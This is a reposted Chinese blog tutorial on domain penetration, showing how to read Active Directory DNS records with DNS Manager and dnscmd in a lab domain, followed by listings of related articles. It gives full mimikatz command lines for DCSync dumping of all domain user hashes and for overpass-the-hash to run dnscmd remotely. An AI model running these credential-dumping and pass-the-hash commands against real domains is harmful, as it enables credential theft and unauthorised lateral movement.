bat 域 本机管理员密码_域渗透——DNS记录的获取

最新推荐文章于 2023-06-03 13:30:36 发布
最新推荐文章于 2023-06-03 13:30:36 发布
阅读量406 收藏 1
点赞数
文章标签: bat 域 本机管理员密码 c获取当前系统时间 github里的默认域 xamarin.forms 获取download路径

0x00 前言

在域渗透中,对域环境的信息搜集很关键,如果我们获得了域内管理员的权限,那么如何能够快速了解域内的网络架构呢?DNS记录无疑是一个很好的参考。

本文将要介绍在域渗透中,获取DNS记录的常用方法。

0x01 简介

本文将要介绍以下内容:

· 通过DNS Manager获取DNS记录

· 通过dnscmd获取DNS记录

· 域内远程读取DNS记录的方法

0x02 通过DNS Manager获取DNS记录

测试系统:

· Windows Server 2008 R2 x64

选择Administrative Tools -> DNS。

在Forward Lookup Zones下找到当前域名,能够显示当前域内的DNS记录,包括主机名和对应的IP。

如下图:

d5a3e9969deb44a5e3839d5770e171d3.png

0x03 通过dnscmd获取DNS记录

dnscmd:

用来管理DNS服务器的命令行接口,支持远程连接。

默认安装的系统:

· Windows Server 2003

· Windows Server 2008

· Windows Server 2003 R2

· Windows Server 2008 R2

· Windows Server 2012

· Windows Server 2003 with SP1

参考资料:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc772069(v=ws.11)

Win7系统在使用时需要安装Remote Server Administration Tools (RSAT)

参考地址:

https://support.microsoft.com/en-us/help/2693643/remote-server-administration-tools-rsat-for-windows-operating-systems

RSAT下载地址:

https://www.microsoft.com/en-us/download/details.aspx?id=7887

测试系统:

· Windows Server 2008 R2 x64

常用命令:

(1)列出DNS区域中当前节点的资源记录:

Dnscmd . /EnumZones

如下图:

057c69222a892b2c65108d4114838e8a.png

(2)列出http://test.com的信息:

Dnscmd . /ZoneInfo test.com

如下图:

67d11ab86e24049a76a67da946395f7a.png

(3)列举http://test.com中的记录,方法1(更详细):

Dnscmd . /ZonePrint test.com

如下图:

130336b692cd87ee41686f63d3e00031.png

(4)列举http://testc.com的记录,方法2:

Dnscmd . /EnumRecords test.com .

如下图:

6fa9c9ce7703c68c1f790ca47f25610e.png

结果同DNS Manager获取的记录一致。

0x04 域内远程读取DNS记录的方法

方法分析

前提需要获得域管理员的权限。

第一种方法是先远程连接域控制器,然后在域控制器上执行dnscmd获取DNS记录。

第二种方法是在域内一台主机上面,执行dnscmd远程读取DNS记录。

但是Win7系统默认不支持dnscmd,直接安装Remote Server Administration Tools (RSAT)也不现实。

于是,我尝试寻找在未安装Remote Server Administration Tools (RSAT)的系统上执行dnscmd的方法。

方法测试

向未安装Remote Server Administration Tools (RSAT)的Win7系统上复制一个dnscmd.exe,直接执行,结果失败。

解决方法

通过Process Monitor记录dnscmd的执行过程,查看缺少哪些文件。

如下图:

272a716de27b454a8021634538b89493.png

发现缺少文件dnscmd.exe.mui。

补全缺少的文件,再次测试,最终找到解决方法。

在未安装Remote Server Administration Tools (RSAT)的系统上执行dnscmd,需要满足以下条件:

1、dnscmd保存在路径C:WindowsSystem32下

2、dnscmd.exe.mui保存在C:WindowsSystem32en-US下(该位置比较通用,也可以在其他位置)

注:dnscmd和dnscmd.exe.mui使用Windows Server 2008 R2下的即可。

这里提供一个测试文件(我从Windows Server 2008 R2下获得的):

https://github.com/3gstudent/test/dnscmd.exe

https://github.com/3gstudent/test/dnscmd.exe.mui

注:

仅供测试。

由于dnscmd在远程连接时,未提供输入用户名和口令的接口,这里需要借助mimikatz的Overpass-the-hash。

首先需要获得域管理员用户的hash,这里只能用ntlm/rc4/aes128/aes256

如果获得了域管理员用户的明文口令,可以先将明文转为ntlm,在线加密的网站:

https://md5decrypt.net/en/Ntlm/

补充:使用dcsync获得域内所有用户hash的方法。

域控制器上执行mimikatz:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

实际测试

测试环境的参数如下:

· 域管理员用户:Administrator

· 口令:DomainAdmin456!

· hash:A55E0720F0041193632A58E007624B40

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40"

这样会弹出一个cmd.exe

接着使用dnscmd远程连接进行查询:

Dnscmd WIN-F08C969D7FM.test.com /EnumZones

or

Dnscmd WIN-F08C969D7FM /EnumZones

注:这里要使用FQDN或者计算机名。

如下图:

1b282970d24d3e92c74f4147b1a83a4e.png

如果想在命令行下实现整个流程,可以采用如下方法:

新建c:test1.bat,内容如下:

Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:testout.txt

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:"cmd.exe /c c:test1.bat""

注:cmd.exe下"需要使用转义字符"

0x05 小结

本文介绍了在域内使用Overpass-the-hash实现dnscmd远程读取DNS记录的方法。

本文为 3gstudent 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://www. 4hou.com/technology/170 54.html 更多内容请关注“嘶吼专业版”——Pro4hou
weixin_39679370
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透DNS记录获取
谢公子的博客
08-04 2171
目录 通过DNS管理器获取DNS记录 通过dnscmd获取DNS记录 内远程读取DNS记录的方法 在内网进行横向渗透时,通过对DNS记录获取,可以定位很多重要的服务器。 通过DNS管理器获取DNS记录 需要在控上操作。开始——>管理工具——>DNS 通过dnscmd获取DNS记录 位于:c:\windows\system32\dnscmd.exe ,以下系统默认安装有dnscmd Windows Server 2003 Windows Server 2008..
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
Windows系统IP和DNS自动获取脚本.bat
01-06
Windows系统IP和DNS变更脚本,执行后擦除手动设置的ip,变成自动获取ip ,适用于调试时频繁变更ip用
bat 本机管理员密码_内突破防火墙获取目标机器权限
weixin_39902472的博客
11-21 90
情景如下在获取到了管理员权限,其中一台机器上面存放绝密资料,但是该机器的防火墙是打开的,所有入站请求都被拦截,也就是说不能进行远程桌面连接、远程过程调用(RPC)等方式执行命令。思路1- 启动脚本在控制器上配置组策略,用户下次登录时运行我们指定好的脚本服务器管理器->功能->组策略管理->林: z3r0.com -> Default Domain Policy右键点...
bat 本机管理员密码_获取管理员和用户信息
weixin_39632471的博客
11-22 1396
1.查找所有用户列表向控制器进行查询net user /domain获取内用户的详细信息wmic useraccount get /all获取到的信息包含用户名,描述信息,SID,名,状态等等。获取存在的用户(要在 Active Directory 管理服务器上运行。)dsquery userdsquery computer 查找目录中的计算机dsquery conta...
bat脚本自动配置IP及DNS
weixin_38912654的博客
12-18 1550
说明:本脚本自我编写完成,如有不足敬请批评,定虚心接受改正。 PS:新建记事本复制以下代码到记事本,将记事本命名为IP、DNS自动配置.bat(如果保存后还是文本类型文件请百度:如何显示扩展名) 1:关于如何修改IP和DNS参数 答:在代码标明了::在此修改参数 2.关于本地连接要修改得问题 因为每台电脑的网卡名字可能不同有些是“本地连接”有些是“以太网”这就请根据实际修改netsh...
ATT&CK实战系列——红队实战(二)
Demonering的博客
02-23 5146
环境配置 首先在VMware->编辑->虚拟网络编辑器 更改子网ip为192.168.111.0 环境说明 DC IP:10.10.10.10 OS:Windows 2012 WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去) IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,密码过期kerberos认证错误导致部分服务不可用)
qq_45290991的博客
09-24 1753
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2188
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3211
学习sqlmap自动注入
bat批处理配置网卡IP地址DNS
10-10
参数列表: 1:指令名 SetIP或者SetDNS 2:网卡MAC地址 如果要设为自动获取,后面就不需要参数了 如果是设置静态IP需要再带3个参数: IP地址 子网掩码 网关(可以为空) 设置DNS: DNS1 DNS2(可选) 如果无法运行,请安装.net4.0运行库
bat脚本代码,一键修改网卡的dns地址和恢复为DHCP获取的方式
junlan的博客
06-03 3926
@echo offREM 指定为 Unicode 编码(65001)来解决中文乱码的问题 chcp 65001 >nulREM 脚本以管理员身份运行 %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit cd /d "%~dp0"echo 请选择操作: echo =============================
Windows 批处理bat查询内存条和DNS信息
cbuy888的博客
09-02 1265
1.查询内存条 wmic path Win32_PhysicalMemory get /value | findstr "Capacity=" 2.查询DNS netsh interface ip show dnsservers|findstr "[0-9]*\.[0-9]*\." 3. powershell调用CMD cmd /c "wmic path Win32_PhysicalMemory get /value | findstr "Capacity="" cmd /c "netsh...
bat批处理开发-wifi联网系列(4):连接wifi,获取本机ip、网关及dns,并通过ping对wifi网络的连通性可用性进行检测
u010870574的专栏
10-05 4371
公司wifi很不稳定,编写了个wifi断网后自动重连的批处理,主要包括:可用wifi查询、联网、wifi切换感知、自动检测及掉线重连,网络状态分析等功能。 本次分享第四部分:连接wifi,并对wifi网络的可用性进行检测 上篇bat批处理开发-wifi联网系列(3):查询当前连接的wifi SSID和密码,封装为bat函数(如何传递入参和返回出参)讲到如何查询当前连接的wifi及其密码,并介绍了如何将查询功能封装为函数,入参和出参如何传递等知识。 本篇主要讲解根据ssid连接wif...
MySQL数据表中的数据单表查询
weixin_46516921的博客
11-10 2270
SELECT语句 使用SELECT语句进行对数据表查询;语法格式为: SELECT [ALL | DISTINCT] * | 列名1 [,列名2,…,列名N] FROM 表名 [ WHERE 条件表达式] [GROPUP BY 列名 [ASC | DESC] [HAVING 条件表达式] ] [ORDER BY 列名 [ASC | DESC] , … ] [LIMIT [OFFSET] 记录数]; 语法说明如下: SELECT 子句:表示从表中查询指定的列,当使用 ‘*’时u,用于显示表中所有的列;关键字
利用.bat(批处理文件)程序快速更改电脑DNS配置
weixin_47493171的博客
06-16 1万+
利用.bat程序快速更换电脑DNS配置
mimikatz实战渗透抓取管理员密码
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这实验所需要的工具我会上传到我的资源面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这攻击利用的msf面的regsvr32_applocker_bypass_ser
老师好,请问bat自动获取DNS,我写的命令为什么不能自动获取DNS
chadi3362的博客
07-26 723
for /f "tokens=16" %%i in ('ipconfig ^|find /i "ipv4"') do set ip=%%i for /f "tokens=15" %%i in ('ipconfig /all ^| find /i "子网掩码 "') do set mask=%%i for /f "tokens=15" %%i in ('ipconfig /all ^| find...
应用nslookup命令查看A记录、MX记录、CNAME记录和NS记录
热门推荐
qq_38058202的博客
05-27 6万+
nslookup是一种网络管理命令行工具,可用于查询DNS名和IP地址输入指令nslookup默认服务器和Address是当前上网所用的DNS服务器名和地址A记录A(Address)记录指的是用来指定主机名或名对应的IP记录。在提示符>后直接输入名,可以查看该名的A记录:MX记录MX(mail exchanger)记录,邮件交换记录,它指向一个邮件服务器,用于电子邮件系统发邮件时根...
bat脚本 获取管理员权限
最新发布
06-28
在某些情况下,需要获取管理员权限才能执行一些操作,这时就需要在BAT脚本中添加获取管理员权限的代码。 获取管理员权限的方法有很多种,下面介绍两种比较常用的方法: 1. 使用runas命令 runas命令可以在命令行中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值